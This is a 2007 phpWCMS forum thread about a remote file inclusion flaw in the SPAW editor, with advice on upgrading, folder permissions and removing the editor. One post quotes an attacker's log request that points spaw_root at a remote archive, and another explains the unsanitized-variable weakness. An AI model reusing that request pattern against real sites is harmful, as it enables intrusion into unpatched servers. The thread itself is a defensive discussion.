SPAW Vulnerability

Peekay · Post by **Peekay** » Tue 19. Jun 2007, 01:13

Apparently, Spaw version 1.0. has a vulnerability, specifically involving 'spaw_control.class.php'. According to Secunia, the issue is resolved by upgrading Spaw to version > 1.0.4.

http://secunia.com/advisories/10451/

and Solmetra (the makers of Spaw) recommend upgrading to at least 1.2.4., the current version being 2.0.4.1.

DeXXus · Post by **DeXXus** » Tue 19. Jun 2007, 02:43

"/include/inc_ext/spaw2/spaw.inc.php"

SPAW Editor v.2

Peekay · Post by **Peekay** » Tue 19. Jun 2007, 10:46

This is relevent to those still using PHPWCMS 1.28 or earlier, which included Spaw 1.0.

DeXXus · Post by **DeXXus** » Tue 19. Jun 2007, 13:17

You're right, of course!
It would ~seem~ that, unless they are sharp, it would be tough for most folks to implement the new version AND add the "phpWCMS-specific" customization.

Peekay · Post by **Peekay** » Tue 19. Jun 2007, 21:46

Thx DeXXus.

Could you give a considered opinion on this phpmailer issue too?

http://www.phpwcms.de/forum/viewtopic.php?t=15053

It may also be insignificant, but I was alerted to it and the class file is present in 1.2.8 and earlier.

sebby · Post by **sebby** » Sun 24. Jun 2007, 16:58

Hello,

This thread should most definitely be moved to the Security alert forum as many others out there (that are also using spaw as a third party product) have already been hit through that vulnerability.

Regards,

1996 328ti · Post by **1996 328ti** » Fri 7. Sep 2007, 17:32

The last time I upgraded I lost the some of my RTs so I am still on an older version.
What is SPAW used for?

Pappnase · Post by **Pappnase** » Sat 8. Sep 2007, 02:35

hello

spaw is only an wysiwyg editor so if you use the fck editor you can delete the spaw folder.

1996 328ti · Post by **1996 328ti** » Sat 8. Sep 2007, 03:26

Pappnase wrote:hello

spaw is only an wysiwyg editor so if you use the fck editor you can delete the spaw folder.

Thanks. I'll delete it them.

Whoever hacked into my site placed this in my spaw directory.

include/inc_ext/spaw/dialogs/table.php?spaw_root=http://----.org/coo2.zip? HTTP/1.1" 200 1203364

Pappnase · Post by **Pappnase** » Sat 8. Sep 2007, 07:48

hello

as far as i know could this only happen if you setup the wrong rights to the folders.

DeXXus · Post by **DeXXus** » Sat 8. Sep 2007, 09:26

Pappnase wrote:hello

as far as i know could this only happen if you setup the wrong rights to the folders.

Just an additional possible vulnerability:

The OLD vulnerability (phpWCMS v1.26) was also something to do with register_globals:

Exploit:
~~~~~
Variable $spaw_root not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

Solution :
~~~~~~~
declare variable $spaw_root

Pappnase · Post by **Pappnase** » Sat 8. Sep 2007, 10:21

ahhh

sorry dex

lucky to have sombody who's watching me

DeXXus · Post by **DeXXus** » Sat 8. Sep 2007, 11:23

Pappnase wrote:ahhh

sorry dex lucky to have sombody who's watching me

@Pappnase

HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!

Pappnase · Post by **Pappnase** » Sat 8. Sep 2007, 11:41

DeXXus wrote:
Pappnase wrote:ahhh

sorry dex lucky to have sombody who's watching me
@Pappnase

HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!

he dex

if you would be an woman i would give you a kiss. but now you get only an beer

1996 328ti · Post by **1996 328ti** » Sun 9. Sep 2007, 21:48

Pappnase wrote:hello

as far as i know could this only happen if you setup the wrong rights to the folders.

I'm going over permissions since I've installed this so long ago. What should /includes and /images be set to?